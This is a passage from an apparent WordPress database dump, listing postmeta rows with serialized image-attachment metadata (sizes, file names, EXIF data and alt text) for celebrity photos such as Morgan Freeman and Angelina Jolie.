y-Kravitz-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"Lenny-Kravitz-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"Lenny-Kravitz-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"Lenny-Kravitz-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"Lenny-Kravitz-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"Lenny-Kravitz-324x386.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:386;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"Lenny-Kravitz-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"Lenny-Kravitz-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"Lenny-Kravitz-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"Lenny-Kravitz-534x386.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:386;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"Lenny-Kravitz-600x385.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"DSLR-A100\";s:7:\"caption\";s:8:\"SONY DSC\";s:17:\"created_timestamp\";s:10:\"1257099207\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"80\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:8:\"SONY DSC\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(608,123,'_wp_attachment_image_alt','Lenny Kravitz'),(609,78,'_thumbnail_id','123'),(611,124,'_wp_attached_file','2015/06/Morgan-Freeman.jpg'),(612,124,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:534;s:4:\"file\";s:26:\"2015/06/Morgan-Freeman.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Morgan-Freeman-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Morgan-Freeman-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Morgan-Freeman-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:24:\"Morgan-Freeman-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:25:\"Morgan-Freeman-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:26:\"Morgan-Freeman-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:26:\"Morgan-Freeman-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:26:\"Morgan-Freeman-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:26:\"Morgan-Freeman-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:26:\"Morgan-Freeman-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:26:\"Morgan-Freeman-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:26:\"Morgan-Freeman-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:26:\"Morgan-Freeman-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:26:\"Morgan-Freeman-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:26:\"Morgan-Freeman-696x465.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:465;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:26:\"Morgan-Freeman-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:26:\"Morgan-Freeman-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:26:\"Morgan-Freeman-629x420.jpg\";s:5:\"width\";i:629;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(613,124,'_wp_attachment_image_alt','Morgan Freeman'),(614,79,'_thumbnail_id','124'),(616,125,'_wp_attached_file','2015/06/Robert-Englund.jpg'),(617,125,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:26:\"2015/06/Robert-Englund.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Robert-Englund-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Robert-Englund-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:24:\"Robert-Englund-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:25:\"Robert-Englund-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:26:\"Robert-Englund-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:26:\"Robert-Englund-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:26:\"Robert-Englund-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:26:\"Robert-Englund-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:26:\"Robert-Englund-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:26:\"Robert-Englund-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:26:\"Robert-Englund-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:26:\"Robert-Englund-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:26:\"Robert-Englund-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:26:\"Robert-Englund-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:26:\"Robert-Englund-560x420.jpg\";s:5:\"width\";i:560;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(618,125,'_wp_attachment_image_alt','Robert Englund'),(619,80,'_thumbnail_id','125'),(621,126,'_wp_attached_file','2015/06/Zachary-Quinto.jpg'),(622,126,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:537;s:4:\"file\";s:32:\"2015/06/Zachary-Quinto.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"Zachary-Quinto-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"Zachary-Quinto-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"Zachary-Quinto-768x516.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:30:\"Zachary-Quinto-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:31:\"Zachary-Quinto-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:32:\"Zachary-Quinto-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:32:\"Zachary-Quinto-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:32:\"Zachary-Quinto-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:32:\"Zachary-Quinto-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:32:\"Zachary-Quinto-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:32:\"Zachary-Quinto-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:32:\"Zachary-Quinto-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:32:\"Zachary-Quinto-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:32:\"Zachary-Quinto-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:32:\"Zachary-Quinto-696x467.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:467;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:32:\"Zachary-Quinto-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:32:\"Zachary-Quinto-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:32:\"Zachary-Quinto-626x420.jpg\";s:5:\"width\";i:626;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"NIKON D80\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1240255552\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"100\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(623,126,'_wp_attachment_image_alt','Zachary Quinto'),(624,81,'_thumbnail_id','126'),(628,81,'_wp_old_slug','%ef%bb%bf%ef%bb%bfzachary-quinto'),(630,81,'_wp_old_slug','the-zachary-quinto'),(631,127,'_wp_attached_file','2015/06/Anderson-Cooper.jpg'),(632,127,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:698;s:4:\"file\";s:27:\"2015/06/Anderson-Cooper.jpg\";s:5:\"sizes\";a:20:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Anderson-Cooper-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Anderson-Cooper-300x204.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"Anderson-Cooper-768x524.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:524;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"Anderson-Cooper-1024x698.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:698;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:25:\"Anderson-Cooper-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:26:\"Anderson-Cooper-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:27:\"Anderson-Cooper-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:27:\"Anderson-Cooper-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:27:\"Anderson-Cooper-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:27:\"Anderson-Cooper-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:27:\"Anderson-Cooper-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:27:\"Anderson-Cooper-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:27:\"Anderson-Cooper-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:27:\"Anderson-Cooper-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:27:\"Anderson-Cooper-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:27:\"Anderson-Cooper-696x474.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:474;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:27:\"Anderson-Cooper-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:27:\"Anderson-Cooper-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:28:\"Anderson-Cooper-1024x580.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:27:\"Anderson-Cooper-616x420.jpg\";s:5:\"width\";i:616;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(633,127,'_wp_attachment_image_alt','Anderson Cooper'),(634,115,'_thumbnail_id','127'),(636,128,'_wp_attached_file','2015/06/Angelina-Jolie.jpg'),(637,128,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:640;s:4:\"file\";s:26:\"2015/06/Angelina-Jolie.jpg\";s:5:\"sizes\";a:19:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Angelina-Jolie-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Angelina-Jolie-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Angelina-Jolie-768x614.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:614;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:24:\"Angelina-Jolie-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:25:\"Angelina-Jolie-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:26:\"Angelina-Jolie-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:26:\"Angelina-Jolie-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:26:\"Angelina-Jolie-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:26:\"Angelina-Jolie-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:26:\"Angelina-Jolie-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:26:\"Angelina-Jolie-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:26:\"Angelina-Jolie-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:26:\"Angelina-Jolie-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:26:\"Angelina-Jolie-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:26:\"Angelina-Jolie-696x557.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:557;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:26:\"Angelina-Jolie-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:26:\"Angelina-Jolie-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:26:\"Angelina-Jolie-800x580.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:26:\"Angelina-Jolie-525x420.jpg\";s:5:\"width\";i:525;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(638,128,'_wp_attachment_image_alt','Angelina Jolie'),(639,117,'_thumbnail_id','128'),(641,129,'_wp_attached_file','2015/05/Sabrina-Carpenter.jpg'),(642,129,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:683;s:4:\"file\";s:29:\"2015/05/Sabrina-Carpenter.jpg\";s:5:\"sizes\";a:20:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Sabrina-Carpenter-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Sabrina-Carpenter-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"Sabrina-Carpenter-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"Sabrina-Carpenter-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:27:\"Sabrina-Carpenter-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:28:\"Sabrina-Carpenter-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:29:\"Sabrina-Carpenter-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:29:\"Sabrina-Carpenter-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:29:\"Sabrina-Carpenter-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:29:\"Sabrina-Carpenter-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:29:\"Sabrina-Carpenter-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:29:\"Sabrina-Carpenter-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:29:\"Sabrina-Carpenter-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:29:\"Sabrina-Carpenter-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:29:\"Sabrina-Carpenter-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:29:\"Sabrina-Carpenter-696x464.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:464;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:29:\